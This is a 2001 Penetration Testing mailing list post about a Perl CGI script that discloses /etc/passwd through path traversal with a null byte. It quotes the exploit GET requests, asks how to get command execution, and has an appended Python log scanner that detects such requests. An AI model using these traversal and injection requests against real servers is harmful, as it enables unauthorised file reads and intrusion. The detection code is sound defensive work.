Penetration Testing mailing list archives

vulnerable perl script?


From: otaner () gmx ch
Date: Thu, 18 Oct 2001 19:07:27 +0200 (MEST)

Hi,

I'm doing a pen test and I found a Perl script which seems to be
vulnerable. If I do a GET, for example:

GET /cgi-bin/whatever.pl?variable1=test%00&variable2=../../../../../../etc/passwd%00

I can see the content of the passwd file. But when I try to execute a
command, for example:

GET /cgi-bin/whatever.pl?variable1=test%00&variable2=../../../../../../bin/id%00

I get this garbage and some interesting stuff:





I'm not sure, but I think the %00 is the problem, and without %00 I get no
results. Does anybody know how I can execute my commands? I tried ; and ¦,
but nothing happened. I'm not able to see the source of the Perl file.

Any help would be appreciated.

otaner
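
For whoever operates a server receiving requests like the two quoted above, here is an added example (not part of the original post, and not the script under test) that flags NUL bytes and `../` sequences in query parameters found in access logs. The log lines, client addresses, function names and the Common Log Format layout are all constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Constructed access-log lines (Common Log Format); hosts are documentation addresses.
SAMPLE_LOG = """\
192.0.2.10 - - [18/Oct/2001:19:01:02 +0200] "GET /cgi-bin/whatever.pl?variable1=test&variable2=report.txt HTTP/1.0" 200 512
192.0.2.44 - - [18/Oct/2001:19:03:40 +0200] "GET /cgi-bin/whatever.pl?variable1=test%00&variable2=../../../../../../etc/passwd%00 HTTP/1.0" 200 1403
192.0.2.44 - - [18/Oct/2001:19:04:11 +0200] "GET /cgi-bin/whatever.pl?variable1=a&variable2=%252e%252e%252fetc%252fpasswd HTTP/1.0" 200 0
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(raw: str, max_rounds: int = 3) -> bytes:
    """Percent-decode repeatedly so double-encoded input (%252e) is also seen."""
    data = raw.encode("latin-1", "replace")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    return data

def inspect_line(line: str) -> dict:
    """Return {parameter name: [findings]} for one log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return {}
    findings = {}
    for pair in urlsplit(match.group(1)).query.split("&"):
        name, _, value = pair.partition("=")
        data = decode_fully(value.replace("+", " "))
        hits = []
        if b"\x00" in data:  # a NUL never belongs in a file name parameter
            hits.append("nul-byte")
        if b".." in re.split(rb"[/\\]", data):  # ".." as a whole path segment
            hits.append("path-traversal")
        if hits:
            findings[name] = hits
    return findings

def scan(log_text: str) -> list:
    """List (line number, findings) for every line with at least one finding."""
    results = [(n, inspect_line(l)) for n, l in enumerate(log_text.splitlines(), 1)]
    return [(n, f) for n, f in results if f]
```
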

